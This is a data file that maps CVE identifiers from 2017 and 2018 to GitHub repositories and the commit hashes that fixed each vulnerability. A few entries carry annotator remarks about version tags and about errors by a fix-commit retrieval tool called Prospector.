-CVE-2017-7662;https://github.com/apache/cxf-fediz;None:None;False;c68e4820816c19241568f4a8fe8600bffb0243cd,71480c3f7e516cf0d535fdd5abec63ab455e4d06; -CVE-2017-7666;https://github.com/apache/openmeetings;None:None;False;aadcd3e4eaaba5a6d322eb53f48c3bbb4fd7a5da,44800f8a18c7e9a30b379ef057067cb26181b532; -CVE-2017-7674;https://github.com/apache/tomcat;None:None;False;b94478d45b7e1fc06134a785571f78772fa30fed; -CVE-2017-7675;https://github.com/apache/tomcat;None:None;False;dacb030b85fe0e0b3da87469e23d0f31252fdede,cf181edc9a8c239cde704cffc3c503425bdcae2b; -CVE-2017-7688;https://github.com/apache/openmeetings;None:None;False;13fe2f382240eab90f3050ecb7ea84d7121f4081; -CVE-2017-7860;https://github.com/grpc/grpc;None:None;False;f05359f6975003197d83ec5a1b78893e01000f99,bcd5f12e4bca2ed2c00cddb5ffd046aef6f4fb31,e2869fee8db5f7a94858b551089c45bbb1bd943b,d9314adb8e3bc687d15269c6e25554741ded4ea6,5f13f4898612c136cff1f2d04a91c25b6d4b694a; unknown, version not specified properly -CVE-2017-7861;https://github.com/grpc/grpc;None:None;False;f05359f6975003197d83ec5a1b78893e01000f99,bcd5f12e4bca2ed2c00cddb5ffd046aef6f4fb31,e2869fee8db5f7a94858b551089c45bbb1bd943b,d9314adb8e3bc687d15269c6e25554741ded4ea6,5f13f4898612c136cff1f2d04a91c25b6d4b694a; unknown, version not specified properly -CVE-2017-7957;https://github.com/x-stream/xstream;None:None;False;b3570be2f39234e61f99f9a20640756ea71b1b40,6e546ec366419158b1e393211be6d78ab9604abe; -CVE-2017-8028;https://github.com/spring-projects/spring-ldap;None:None;False;08e8ae289bbd1b581986c7238604a147119c1336; -CVE-2017-8045;https://github.com/spring-projects/spring-amqp;None:None;False;36e55998f6352ba3498be950ccab1d5f4d0ce655,83fe9fdec2c86a57898d56c5e109debd9d5c07d9,296d481f980fcbecbee01244e3644e254470a86e,6e9e00bb5bf0aa88444146db3c2eae138cc7b0a1; -CVE-2017-8046;https://github.com/spring-projects/spring-data-rest;None:None;False;f5bfe5358864de1a15566110de7ad7e5ffb48e99,8f269e28fe8038a6c60f31a1c36cfda04795ab45,824e51a1304bbc8334ac0b96ffaef588177e6ccd; vulnerable tag is fixed, but wrong tagging I believe -CVE-2017-8109;https://github.com/saltstack/salt;None:None;False;8492cef7a5c8871a3978ffc2f6e48b3b960e0151,6e34c2b5e5e849302af7ccd00509929c3809c658; -CVE-2017-8342;https://github.com/Kozea/Radicale;None:None;False;190b1dd795f0c552a4992445a231da760211183b,059ba8dec1f22ccbeab837e288b3833a099cee2d; -CVE-2017-8359;https://github.com/grpc/grpc;None:None;False;aab6992c006be6fb80df73fd9f218365099c016d,6544a2d5d9ecdb64214da1d228886a7d15bbf5c7; -CVE-2017-8418;https://github.com/rubocop/rubocop;None:None;False;dcb258fabd5f2624c1ea0e1634763094590c09d7; -CVE-2017-8658;https://github.com/chakra-core/ChakraCore;None:None;False;d08f260e7edabb2d4f90fd733b01eeaca1915222,63034a01dc508f27ced7099c9cc97babc4aebc1f,2500e1cdc12cb35af73d5c8c9b85656aba6bab4d,5c6fbc61ccc57826e0daaf07a71c2c536614c2ad; -CVE-2017-8932;https://github.com/golang/go;None:None;False;9294fa2749ffee7edbbb817a0ef9fe633136fa9c; -CVE-2017-9096;https://github.com/albfernandez/itext2;None:None;False;ad4259e57412f4b538df3a57c55e814cfe748a72; -CVE-2017-9214;https://github.com/openvswitch/ovs;None:None;False;7b7b186a8d40fc6f287cef2582702181da74bdc3,fafbfa6ea46911aeb0083f166fed215ca71e22b6; -CVE-2017-9265;https://github.com/openvswitch/ovs;None:None;False;1752ea92dc11935e0595d208fdfe8203baf5b55c,050f90662dde1da1ee3cdd209a9b65196a808811; -CVE-2017-9796;https://github.com/apache/geode;None:None;False;02b9646618e074f80b3d5fed0e5b512a34b5897a; -CVE-2017-9841;https://github.com/sebastianbergmann/phpunit;None:None;False;0c1ae1b5324fa10f96129c5679b788cc1ca9468e,284a69fb88a2d0845d23f42974a583d8f59bf5a5; -CVE-2017-10910;https://github.com/mqttjs/MQTT.js;None:None;False;403ba53b838f2d319a0c0505a045fe00239e9923,3323089ee777fcbf2281a3f3a965e2a4cd7c9ad9; -CVE-2017-11173;https://github.com/cyu/rack-cors;None:None;False;42ebe6caa8e85ffa9c8a171bda668ba1acc7a5e6; -CVE-2017-11424;https://github.com/jpadilla/pyjwt;None:None;False;11f30c4050a11b6398d38f505578c9dabeba6c78,37926ea0dd207db070b45473438853447e4c1392; -CVE-2017-11427;https://github.com/onelogin/python-saml;None:None;False;fad881b4432febea69d70691dfed51c93f0de10f; -CVE-2017-11428;https://github.com/onelogin/ruby-saml;None:None;False;048a544730930f86e46804387a6b6fad50d8176f,d7ce607d9f9d996e1046dde09b675c3cf0c01280,a35f7251b86aa3b7caf4a64d8a3451f925e8855c,03af9e33d2d87f4ac9a644c5b0981ded4dca0bb8; -CVE-2017-11467;https://github.com/orientechnologies/orientdb;None:None;False;200535c3183f7db88ee4526bf3316d6bdeddb68e; -CVE-2017-11503;https://github.com/PHPMailer/PHPMailer;None:None;False;dbbc1397c41de56aa3a57c8188d19a345dea5c63; commit timespamt is outside the time interval -CVE-2017-11610;https://github.com/Supervisor/supervisor;None:None;False;dbe0f55871a122eac75760aef511efc3a8830b88,aac3c21893cab7361f5c35c8e20341b298f6462e,90c5df80777bfec03d041740465027f83d22e27b,83060f3383ebd26add094398174f1de34cf7b7f0,058f46141e346b18dee0497ba11203cb81ecb19e; -CVE-2017-11905;https://github.com/chakra-core/ChakraCore;None:None;False;d97375c40cfd2b2376a5c4b6cd34098e1e99e1f1; -CVE-2017-11910;https://github.com/chakra-core/ChakraCore;None:None;False;40232a443c6316a58941572b0a4776b0677975ca; -CVE-2017-12098;https://github.com/sferik/rails_admin;None:None;False;44f09ed72b5e0e917a5d61bd89c48d97c494b41c; -CVE-2017-12158;https://github.com/keycloak/keycloak;None:None;False;d9ffc4fa211bbf2aae49449cb58e02b6ea8cd299,6ea9ed9be8baa7c6971cfbdabecc91555dc561d7; -CVE-2017-12159;https://github.com/keycloak/keycloak;None:None;False;9b75b603e3a5f5ba6deff13cbb45b070bf2d2239,e201f205d162d4d795d294fe065ca20f4005eef2; -CVE-2017-12160;https://github.com/keycloak/keycloak;None:None;False;fea4c54adc6a1fdafb725b89874c389d54b6d04a,96fe4608066d533cc1ff69f23339a710a60e892d; -CVE-2017-12605;https://github.com/opencv/opencv;None:None;False;999f41fb4f4aa94a0cb47256919ae8b5c29ca5f3,72d29259ca741950527c8cca7fb649030c01f658,30f7576029deb8c125ae7688dd57cfa2156a6b72,f0fb665407a1162153930de1ab5a048a4f3d60f9; -CVE-2017-12616;https://github.com/apache/tomcat;None:None;False;07dc0ea2745f0afab6415f22b16a29f1c6de5727; -CVE-2017-12620;https://github.com/apache/opennlp;None:None;False;c2c14e9af7a519aacfde5173f641c86e17ce50ed; -CVE-2017-12622;https://github.com/apache/geode;None:None;False;db4a493efc09600bf0a9778d5274c09b23b16644; -CVE-2017-12624;https://github.com/apache/cxf;None:None;False;a2ce435cf0eedc8158d118d6d275114408d2a376,896bd961cbbb6b8569700e5b70229f78f94ad9dd,8bd915bfd7735c248ad660059c6b6ad26cdbcdf6; -CVE-2017-12629;https://github.com/apache/lucene-solr;None:None;False;926cc4d65b6d2cc40ff07f76d50ddeda947e3cc4,f9fd6e9e26224f26f1542224ce187e04c27b2681,3bba91131b5257e64b9d0a2193e1e32a145b2a23,d8000beebfb13ba0b6e754f84c760e11592d8d14; -CVE-2017-12631;https://github.com/apache/cxf-fediz;None:None;False;e7127129dbc0f4ee83985052085e185e750cebbf,48dd9b68d67c6b729376c1ce8886f52a57df6c45,ccdb12b26ff89e0a998a333e84dd84bd713ac76c; -CVE-2017-12867;https://github.com/simplesamlphp/simplesamlphp;None:None;False;608f24c2d5afd70c2af050785d2b12f878b33c68; -CVE-2017-12868;https://github.com/simplesamlphp/simplesamlphp;None:None;False;caf764cc2c9b68ac29741070ebdf133a595443f1,4bc629658e7b7d17c9ac3fe0da7dc5df71f1b85e; -CVE-2017-12871;https://github.com/simplesamlphp/simplesamlphp;None:None;False;77df6a932d46daa35e364925eb73a175010dc904; -CVE-2017-12873;https://github.com/simplesamlphp/simplesamlphp;None:None;False;a890b60438d4c8bcdcfd770361aedbbe64ad4c74,8cd71966fbd55b7fd67ca8c849eaf1df7ab42462,baba857afb874d8d6cac0fd8e976ff2859a6cd60,90dca835158495b173808273e7df127303b8b953,300d8aa48fe93706ade95be481c68e9cf2f32d1f,e2daf4ceb6e580815c3741384b3a09b85a5fc231; -CVE-2017-13098;https://github.com/bcgit/bc-java;None:None;False;a00b684465b38d722ca9a3543b8af8568e6bad5c; -CVE-2017-14063;https://github.com/AsyncHttpClient/async-http-client;None:None;False;e9f12b29725c567cdb4de98b3302a61ca9d41280,eb9e3347e45319be494db24d285a2aee4396f5d3; -CVE-2017-14136;https://github.com/opencv/opencv;None:None;False;df1a0263299d2875eb51e85351b58d354304da22,aacae2065744adb05e858d327198c7bbe7f452b0; -CVE-2017-14506;https://github.com/geminabox/geminabox;None:None;False;5464f0cebd2e82fbd9fc321d7b5053982429c055,99aaae196c4fc6ae0df28e186ca1e493ae658e02; -CVE-2017-14619;https://github.com/thorsten/phpMyFAQ;None:None;False;30b0025e19bd95ba28f4eff4d259671e7bb6bb86; -CVE-2017-14623;https://github.com/go-ldap/ldap;None:None;False;95ede1266b237bf8e9aa5dce0b3250e51bfefe66,bb09d4b178012d5af4dd3ef600c6ef2b74b639a1; -CVE-2017-14683;https://github.com/geminabox/geminabox;None:None;False;0dc203b6cef5b9f379f2ef6a24a723f852589ee2,a01c4e8b3403624109499dec75eb6ee30bd01a55; -CVE-2017-14695;https://github.com/saltstack/salt;None:None;False;80d90307b07b3703428ecbb7c8bb468e28a9ae6d,206ae23f15cb7ec95a07dee4cbe9802da84f9c42,9ba1f6112fa72627b42eed4c4eea439dce2df31c,31b38f50ebf321a1d14af0868c516a5de865f5a8; -CVE-2017-14735;https://github.com/nahsra/antisamy;None:None;False;e76f02a77afb4e43b897f13d17b5bc1260b8afde; -CVE-2017-15051;https://github.com/nilsteampassnet/teampass;None:None;False;5f16f6bb132138ee04eb1e0debf2bdc7d7b7a15f; -CVE-2017-15052;https://github.com/nilsteampassnet/TeamPass;None:None;False;8f2d51dd6c24f76e4f259d0df22cff9b275f2dd1; -CVE-2017-15053;https://github.com/nilsteampassnet/TeamPass;None:None;False;ef32e9c28b6ddc33cee8a25255bc8da54434af3e; -CVE-2017-15054;https://github.com/nilsteampassnet/TeamPass;None:None;False;9811c9d453da4bd1101ff7033250d1fbedf101fc; -CVE-2017-15055;https://github.com/nilsteampassnet/TeamPass;None:None;False;5f16f6bb132138ee04eb1e0debf2bdc7d7b7a15f; -CVE-2017-15103;https://github.com/heketi/heketi;None:None;False;ed6e9fdecab5994de12547e369af11d0dae18e76,787bae461b23003a4daa4d1d639016a754cf6b00; -CVE-2017-15133;https://github.com/miekg/dns;None:None;False;43913f2f4fbd7dcff930b8a809e709591e4dd79e; -CVE-2017-15278;https://github.com/nilsteampassnet/TeamPass;None:None;False;f5a765381f051fe624386866ddb1f6b5e7eb929b; -CVE-2017-15288;https://github.com/scala/scala;None:None;False;67fcf5ce4496000574676d81ed72e4a6cb9e7757,f3419fc358a8ea6e366538126279da88d4d1fb1f,0f624c5e5bdb39967e208c7c16067c3e6c903f1f,67e1437e55df6789d0883cb8846d12071de75c63,b64ad85d1cfdfff29d0836a66736d6d2b0830c0e; -CVE-2017-15612;https://github.com/lepture/mistune;None:None;False;ab8f7de8bc78c2a88f9e01522b8a3a0aa8cd9416,d6f0b6402299bf5a380e7b4e77bd80e8736630fe; -CVE-2017-15703;https://github.com/apache/nifi;None:None;False;9e2c7be7d3c6a380c5f61074d9a5a690b617c3dc; was 1.4.0.1.5.0 -CVE-2017-15720;https://github.com/apache/airflow;None:None;False;4cf904cf5a7a070bbeaf3a0e985ed2b840276015; -CVE-2017-15728;https://github.com/thorsten/phpMyFAQ;None:None;False;2d2a85b59e058869d7cbcfe2d73fed4a282f2e5b; -CVE-2017-15729;https://github.com/thorsten/phpMyFAQ;None:None;False;867618110feb836e168435548d6c2cbb7c65eda3; -CVE-2017-15730;https://github.com/thorsten/phpMyFAQ;None:None;False;cce47f94375bb0102ab4f210672231dbb854dd0d; -CVE-2017-15731;https://github.com/thorsten/phpMyFAQ;None:None;False;fadb9a70b5f7624a6926b8834d5c6001c210f09c; -CVE-2017-15733;https://github.com/thorsten/phpMyFAQ;None:None;False;ef5a66df4bcfacc7573322af33ce10c30e0bb896; -CVE-2017-15734;https://github.com/thorsten/phpMyFAQ;None:None;False;fa26c52384b010edaf60c525ae5b040f05da9f77; -CVE-2017-15735;https://github.com/thorsten/phpMyFAQ;None:None;False;867618110feb836e168435548d6c2cbb7c65eda3; -CVE-2017-15808;https://github.com/thorsten/phpMyFAQ;None:None;False;a249b4645fb86f6a9fbe5d2344ab1cbdb906b75c; -CVE-2017-15809;https://github.com/thorsten/phpMyFAQ;None:None;False;cb648f0d5690b81647dd5c9efe942ebf6cce7da9; -CVE-2017-15879;https://github.com/keystonejs/keystone;None:None;False;4b019b8cfcb7bea6f800609da5d07e8c8abfc80a; versions/tags do not contain the commit at all (it is a mess) -CVE-2017-15914;https://github.com/borgbackup/borg;None:None;False;75854c1243b29ec5558be6fdefe365cd438abb4c,ea0203bb0de557cd29de5ab0a0efe5f6015ca59d; -CVE-2017-15928;https://github.com/ohler55/ox;None:None;False;e4565dbc167f0d38c3f93243d7a4fcfc391cbfc8; -CVE-2017-16003;https://github.com/felixrieseberg/windows-build-tools;None:None;False;9835d33e68f2cb5e4d148e954bb3ed0221d98e90; -CVE-2017-16006;https://github.com/jonschlinkert/remarkable;None:None;False;43eaf67dd3bb4a850542ad868b59fe75409a17a7,49e24e8f2a431c095ddbb74ecb67cf1cf8f88c47,92d79a99c39a29665f7f4fabc9593f1b30924ca9,49e87b7ae2dc323d83606792a749fb207595249e; -CVE-2017-16007;https://github.com/cisco/node-jose;None:None;False;f92cffb4a0398b4b1158be98423369233282e0af; -CVE-2017-16008;https://github.com/i18next/i18next;None:None;False;34e8e13a2b64708a0aed01092e4dbfd0e5013831; -CVE-2017-16010;https://github.com/i18next/i18next;None:None;False;11f059599889d857d497aa0499355be32df0dbb6,d367309d4427c2d651b0f0b304504cf59c056cab; -CVE-2017-16013;https://github.com/hapijs/hapi;None:None;False;770cc7bad15122f796d938738b7c05b66d2f4b7f; -CVE-2017-16014;https://github.com/http-party/node-http-proxy;None:None;False;07c8d2ee6017264c3d4deac9f42ca264a3740b48; -CVE-2017-16015;https://github.com/caolan/forms;None:None;False;bc01e534a0ff863dedb2026a50bd03153bbc6a5d; -CVE-2017-16016;https://github.com/apostrophecms/sanitize-html;None:None;False;5d205a1005ba0df80e21d8c64a15bb3accdb2403; -CVE-2017-16017;https://github.com/apostrophecms/sanitize-html;None:None;False;7a1deb341b8a9cef807269a1bbcc61207752ea2b; -CVE-2017-16018;https://github.com/restify/node-restify;None:None;False;24c57cef13dced488ca698db72b851cecd687924,d3837a925727d18b03fcd55ecdd534d8a7888d4e,0af5ccab0f3cd779bd2fc30c774c4a4557cd7cc1,a015067232ad62aa035675dc63a46dce31fed3f3; -CVE-2017-16023;https://github.com/sindresorhus/decamelize;None:None;False;76d47d8de360afb574da2e34db87430ce11094e0; -CVE-2017-16025;https://github.com/hapijs/nes;None:None;False;249ba1755ed6977fbc208463c87364bf884ad655; -CVE-2017-16026;https://github.com/request/request;None:None;False;3d31d4526fa4d4e4f59b89cabe194fb671063cdb,29d81814bc16bc79cb112b4face8be6fc00061dd,8902ce12ffed9bf65b3ccc73203f0bc390f156ea; -CVE-2017-16029;https://github.com/henrytseng/hostr;None:None;False;789a00047459fd80b6f0a9701a1378a47fb73ba8; Prospector wrongly retrieves the previous tag as the same to the next one (to fix) -CVE-2017-16031;https://github.com/socketio/socket.io;None:None;False;67b4eb9abdf111dfa9be4176d1709374a2b4ded8,de1afe13172529801e1e091a471441e11ffd85a3; -CVE-2017-16042;https://github.com/tj/node-growl;None:None;False;d71177d5331c9de4658aca62e0ac921f178b0669; vulnerable tag is fixed -CVE-2017-16083;https://github.com/sandy98/node-simple-router;None:None;False;dfdd52e2e80607af433097d940b3834fd96df488; 0.10.0 tag does not exist -CVE-2017-16084;https://github.com/KoryNunn/list-n-stream;None:None;False;99b0b40b34aaedfcdf25da46bef0a06b9c47fb59; this repo has no tags -CVE-2017-16107;https://github.com/Eeems/PooledWebSocket;None:None;False;7b3b4e5c6be6d8a964296fa3c50e38dc07e9701d; -CVE-2017-16136;https://github.com/expressjs/method-override;None:None;False;4c58835a61fdf7a8e070d6f8ecd5379a961d0987; -CVE-2017-16138;https://github.com/broofa/mime;None:None;False;855d0c4b8b22e4a80b9401a81f2872058eae274d,1df903fdeb9ae7eaa048795b8d580ce2c98f40b0; -CVE-2017-16226;https://github.com/browserify/static-eval;None:None;False;c06f1b8c0a0cd1cc989c025fbb4c5776fc661c2c; -CVE-2017-16228;https://github.com/dulwich/dulwich;None:None;False;7116a0cbbda571f7dac863f4b1c00b6e16d6d8d6; -CVE-2017-16244;https://github.com/octobercms/october;None:None;False;4a6e0e1e0e2c3facebc17e0db38c5b4d4cb05bd0; -CVE-2017-16558;https://github.com/contao/contao;None:None;False;6b4a2711edf166c85cfd7a53fed6aea56d4f0544,501cb3cd34d61089b94e7ed78da53977bc71fc3e; -CVE-2017-16570;https://github.com/keystonejs/keystone;None:None;False;4b019b8cfcb7bea6f800609da5d07e8c8abfc80a; How? Prospector finds f08baa4fb4084b7ec9f356d313dcfd6d7d7d0f8b which is the merge commit dated 2017 while the GT has the commits -CVE-2017-16613;https://github.com/openstack-archive/swauth;None:None;False;70af7986265a3defea054c46efc82d0698917298; -CVE-2017-16615;https://github.com/thanethomson/MLAlchemy;None:None;False;bc795757febdcce430d89f9d08f75c32d6989d3c; -CVE-2017-16616;https://github.com/Stranger6667/pyanyapi;None:None;False;810db626c18ebc261d5f4299d0f0eac38d5eb3cf; -CVE-2017-16618;https://github.com/tadashi-aikawa/owlmixin;None:None;False;5d0575303f6df869a515ced4285f24ba721e0d4e; -CVE-2017-16759;https://github.com/librenms/librenms;None:None;False;7887b2e1c7158204ac69ca43beafce66e4d3a3b4,d3094fa6578b29dc34fb5a7d0bd6deab49ecc911; -CVE-2017-16762;https://github.com/sanic-org/sanic;None:None;False;18829e648a26d947b7e441a9d7d012a24b0adf48,ae09dec05e10816b37eed425c87e193d230c5a73,afd51e0823524eec683b226a20f40d958253064f; -CVE-2017-16792;https://github.com/geminabox/geminabox;None:None;False;e7e0b16147677e9029f0b55eff6bc6dda52398d4,f8429a9e364658459add170e4ebc7a5d3b4759e7; -CVE-2017-16876;https://github.com/lepture/mistune;None:None;False;5f06d724bc05580e7f203db2d4a4905fc1127f98; -CVE-2017-16877;https://github.com/vercel/next.js;None:None;False;02fe7cf63f6265d73bdaf8bc50a4f2fb539dcd00; commit timestamp is outside the time interval -CVE-2017-16880;https://github.com/filp/whoops;None:None;False;c16791d28d1ca3139e398145f0c6565c523c291a; -CVE-2017-17042;https://github.com/lsegal/yard;None:None;False;b0217b3e30dc53d057b1682506333335975e62b4; -CVE-2017-17485;https://github.com/FasterXML/jackson-databind;None:None;False;f031f27a31625d07922bdd090664c69544200a5d,978798382ceb72229e5036aa1442943933d6d171,bb45fb16709018842f858f1a6e1118676aaa34bd,2235894210c75f624a3d0cd60bfb0434a20a18bf; -CVE-2017-17760;https://github.com/opencv/opencv;None:None;False;70d49446e99f4caf701e4b007157ef41751bfb46,7bbe1a53cfc097b82b1589f7915a2120de39274c; -CVE-2017-17835;https://github.com/apache/airflow;None:None;False;6aca2c2d395952341ab1b201c59011920b5a5c77; commit timestamp is outside the time interval -CVE-2017-17837;https://github.com/apache/deltaspike;None:None;False;72e607f3be66c30c72b32c24b44e9deaa8e54608,4e2502358526b944fc5514c206d306e97ff271bb,d95abe8c01d256da2ce0a5a88f4593138156a4e5; -CVE-2017-18076;https://github.com/omniauth/omniauth;None:None;False;71866c5264122e196847a3980c43051446a03e9b,61df4e8198b2b33600830e00eaaae0ac0c4cabec; -CVE-2017-18077;https://github.com/juliangruber/brace-expansion;None:None;False;b13381281cead487cbdbfd6a69fb097ea5e456c3,ed46e5ba619bd938e5b84835fca00eed0adc5585; -CVE-2017-18239;https://github.com/jasongoodwin/authentikat-jwt;None:None;False;2d2fa0d40ac8f2f7aa7e9b070fa1a25eee082cb0; -CVE-2017-18361;https://github.com/Pylons/colander;None:None;False;1a17b237fed2fdd3ac0e04ec8bfb4b206c7fe046,d4f4f77a2cfa518426178bd69d2b29dee57f770d,98805557c10ab5ff3016ed09aa2d48c49b9df40b; -CVE-2017-18367;https://github.com/seccomp/libseccomp-golang;None:None;False;06e7a29f36a34b8cf419aeb87b979ee508e58f9e; -CVE-2017-18635;https://github.com/novnc/noVNC;None:None;False;6048299a138e078aed210f163111698c8c526a13,15ce2f71eb660c03237a58a589cd8ad84aa7f20d; -CVE-2017-1000001;https://github.com/fedora-infra/fedmsg;None:None;False;5c21cf88a24fac4c15340cfd68d6d7599ad4a4a2,2bb51cd8e7b2122b04421280ecc6e2db499f1170; -CVE-2017-1000042;https://github.com/mapbox/mapbox.js;None:None;False;538d229ab6767bb4c3f3969c417f9884189c1512,275e404057b221edd276b175e0165f23595ad35a; -CVE-2017-1000056;https://github.com/kubernetes/kubernetes;None:None;False;6f9074f06945247827499b196e0c5c23af1f5c72,ec040ef2521c8a67cc44e9ed323cbf0053268798,dd7561801aa7b7f00f1556d38a14488246821d91,52f6d3fbfb339605bb54bf04c5d8f6f4adc518f6,7fef0a4f6a44ea36f166c39fdade5324eff2dd5e; -CVE-2017-1000069;https://github.com/bitly/oauth2_proxy;None:None;False;4464655276877f1951fddf238cdfeca3cbca83ef,55085d9697962668fd4e43e8e4644144fe83cd93; -CVE-2017-1000070;https://github.com/bitly/oauth2_proxy;None:None;False;86d083266b747825a05f639560141e542019cf26,289a6ccf463a425c7606178c510fc5eeb9c8b050; -CVE-2017-1000188;https://github.com/mde/ejs;None:None;False;49264e0037e313a0a3e033450b5c184112516d8f; -CVE-2017-1000189;https://github.com/mde/ejs;None:None;False;49264e0037e313a0a3e033450b5c184112516d8f; -CVE-2017-1000209;https://github.com/TakahikoKawasaki/nv-websocket-client;None:None;False;a158795432699ff06568b66517db2ca9fde282b2,feb9c8302757fd279f4cfc99cbcdfb6ee709402d,fb23d30966b8abba920fa90b49201192c66f56bf; vulnerable tag is fixed -CVE-2017-1000228;https://github.com/mde/ejs;None:None;False;3d447c5a335844b25faec04b1132dbc721f9c8f6; -CVE-2017-1000246;https://github.com/IdentityPython/pysaml2;None:None;False;7323f5c20efb59424d853c822e7a26d1aa3e84aa,79d679883f0b198511ea5eeaaf53f1f625e8d938; -CVE-2017-1000248;https://github.com/redis-store/redis-store;None:None;False;ce13252c26fcc40ed4935c9abfeb0ee0761e5704,e0c1398d54a9661c8c70267c3a925ba6b192142e; -CVE-2017-1000389;https://github.com/jenkinsci/global-build-stats-plugin;None:None;False;8322b1333329f418ea89f7c3a1528b976f6a1ede; -CVE-2017-1000427;https://github.com/markedjs/marked;None:None;False;cd2f6f5b7091154c5526e79b5f3bfb4d15995a51,8f9d0b72f5606ed32057049f387161dd41c36ade; -CVE-2017-1000431;https://github.com/ezsystems/ezpublish-legacy;None:None;False;c7174295fa0b9bd81bd4af908082464b0b80f278; version is not a git tag -CVE-2017-1000433;https://github.com/IdentityPython/pysaml2;None:None;False;efe27e2f40bf1c35d847f935ba74b4b86aa90fb5,6312a41e037954850867f29d329e5007df1424a5; -CVE-2017-1000450;https://github.com/opencv/opencv;None:None;False;c58152d94ba878b2d7d76bcac59146312199b9eb,a729f985fdc23cd30f3e45909bd627bca1d53c6c,0202e527476daceec544e63068742f70d1dfe934,08a5fe3661b4cab8758e289927cfdc96c10458da,e15a56d142906aea4e7c009d28d7432c0f1cb3a1,c46521ad65bb7c8d5c55a9f696b6bd52acdd17b8; -CVE-2017-1000451;https://github.com/vvakame/fs-git;None:None;False;eb5f70efa5cfbff1ab299fa7daaa5de549243998; -CVE-2017-1000486;https://github.com/primefaces/primefaces;None:None;False;26e44eb7962cbdb6aa2f47eca0f230f3274358f0; -CVE-2017-1000487;https://github.com/codehaus-plexus/plexus-utils;None:None;False;b38a1b3a4352303e4312b2bb601a0d7ec6e28f41; -CVE-2017-1000491;https://github.com/rhysd/Shiba;None:None;False;e8a65b0f81eb04903eedd29500d7e1bedf249eab; -CVE-2017-1001002;https://github.com/josdejong/mathjs;None:None;False;8d2d48d81b3c233fb64eb2ec1d7a9e1cf6a55a90; -CVE-2017-1001003;https://github.com/josdejong/mathjs;None:None;False;a60f3c8d9dd714244aed7a5569c3dccaa3a4e761; -CVE-2017-1001004;https://github.com/josdejong/typed-function;None:None;False;6478ef4f2c3f3c2d9f2c820e2db4b4ba3425e6fe; -CVE-2017-1002150;https://github.com/fedora-infra/python-fedora;None:None;False;b27f38a67573f4c989710c9bfb726dd4c1eeb929; -CVE-2018-0737;https://github.com/openssl/openssl;None:None;False;6939eab03a6e23d2bd2c3f5e34fe1d48e542e787,54f007af94b8924a46786b34665223c127c19081,349a41da1ad88ad87825414752a8ff5fdd6a6c3f; -CVE-2018-0953;https://github.com/chakra-core/ChakraCore;None:None;False;71d7b389a8e01f1f29bff7202270f5ce1d63696a; -CVE-2018-1067;https://github.com/undertow-io/undertow;None:None;False;cc5b9bfb1a516e0102b7a2890277d1ba3132bc67,85d4478e598105fe94ac152d3e11e388374e8b86,f404cb68448c188f4d51b085b7fe4ac32bde26e0; -CVE-2018-1098;https://github.com/etcd-io/etcd;None:None;False;a7e5790c82039945639798ae9a3289fe787f5e56; unknown tags/vers -CVE-2018-1099;https://github.com/etcd-io/etcd;None:None;False;a7e5790c82039945639798ae9a3289fe787f5e56; unknown tags/vers -CVE-2018-1114;https://github.com/undertow-io/undertow;None:None;False;7f22aa0090296eb00280f878e3731bb71d40f9eb,882d5884f2614944a0c2ae69bafd9d13bfc5b64a; -CVE-2018-1193;https://github.com/cloudfoundry/gorouter;None:None;False;6734f35425ce1525660f7b231e030f2660eaf668,11d9b6ebcd319bb25b0e4ceb0b7628381a283785; -CVE-2018-1196;https://github.com/spring-projects/spring-boot;None:None;False;9b8cb9a4639af3b47b5eeec4f5a04261dcd2a058; -CVE-2018-1199;https://github.com/spring-projects/spring-security;None:None;False;65da28e4bf62f58fb130ba727cbbd621b44a36d1,0eef5b4b425ab42b9fa0fde1a3f36a37b92558f2,cb8041ba67635edafcc934498ef82707157fd22a; -CVE-2018-1259;https://github.com/spring-projects/spring-data-commons;None:None;False;b8974a292ab463a304eda987632be4d9c145f5f8,11d0aa1b396d8819a5a0d4933c5cfc72fe9ad102,fd94d3145d6cd2c41b07cdc76d6aa84319c1ad4d; -CVE-2018-1260;https://github.com/spring-projects/spring-security-oauth;None:None;False;70e5ba84ca98b7ab42c1900bdd9fa51b393d611f; -CVE-2018-1261;https://github.com/spring-projects/spring-integration-extensions;None:None;False;a5573eb232ff85199ff9bb28993df715d9a19a25; -CVE-2018-1263;https://github.com/spring-projects/spring-integration-extensions;None:None;False;d10f537283d90eabd28af57ac97f860a3913bf9b; -CVE-2018-1272;https://github.com/spring-projects/spring-framework;None:None;False;ab2410c754b67902f002bfcc0c3895bd7772d39f,e02ff3a0da50744b0980d5d665fd242eedea7675; -CVE-2018-1273;https://github.com/spring-projects/spring-data-commons;None:None;False;08d748a6fd0173a8ba0aa1f240c38afbdaf4ad9f,b1a20ae1e82a63f99b3afc6f2aaedb3bf4dc432a,ae1dd2741ce06d44a0966ecbd6f47beabde2b653; -CVE-2018-1274;https://github.com/spring-projects/spring-data-commons;None:None;False;06b0dab536963da78dadf2ba407e5937d81c348a,371f6590c509c72f8e600f3d05e110941607fbad,3d8576fe4e4e71c23b9e6796b32fd56e51182ee0; -CVE-2018-1284;https://github.com/apache/hive;None:None;False;cbcd846b7dee541595ceebdfb8ae367c11b1e666,f80a38ae1174553022deae4f8774918401d9756d,b0a58d245875dc1b3ac58a7cf1a61d3b17805e96; -CVE-2018-1304;https://github.com/apache/tomcat;None:None;False;723ea6a5bc5e7bc49e5ef84273c3b3c164a6a4fd,2d69fde135302e8cff984bb2131ec69f2e396964,5af7c13cff7cc8366c5997418e820989fabb8f48; -CVE-2018-1309;https://github.com/apache/nifi;None:None;False;28067a29fd13cdf8e21b440fc65c6dd67872522f; -CVE-2018-1314;https://github.com/apache/hive;None:None;False;c39b5d1bc3011cf900db4e7911232c1d0fb7f576,3b1d4fdfdfecbf162b60ec0e49a07595a8a51e79; commit timestamp is outside the time interval -CVE-2018-1320;https://github.com/apache/thrift;None:None;False;d973409661f820d80d72c0034d06a12348c8705e; -CVE-2018-1336;https://github.com/apache/tomcat;None:None;False;92cd494555598e99dd691712e8ee426a2f9c2e93; -CVE-2018-1339;https://github.com/apache/tika;None:None;False;1b6ca3685c196cfd89f5f95c19cc919ce10c5aff,ffb48dd29d0c2009490caefda75e5b57c7958c51; -CVE-2018-3711;https://github.com/fastify/fastify;None:None;False;7f2b88f7f523698b8bf258f8235c400af4532097,fabd2a011f2ffbb877394abe699f549513ffbd76,c42fd308d82aa57eb15a41d7dd60a2351302c64a,79edc6b8b726bcc2d394fc83479f14e9c5c10b34; -CVE-2018-3712;https://github.com/vercel/serve;None:None;False;6adad6881c61991da61ebc857857c53409544575; -CVE-2018-3714;https://github.com/nim579/node-srv;None:None;False;15be996c0520ac6e4dee0cf0808fc7e72effd2a2; 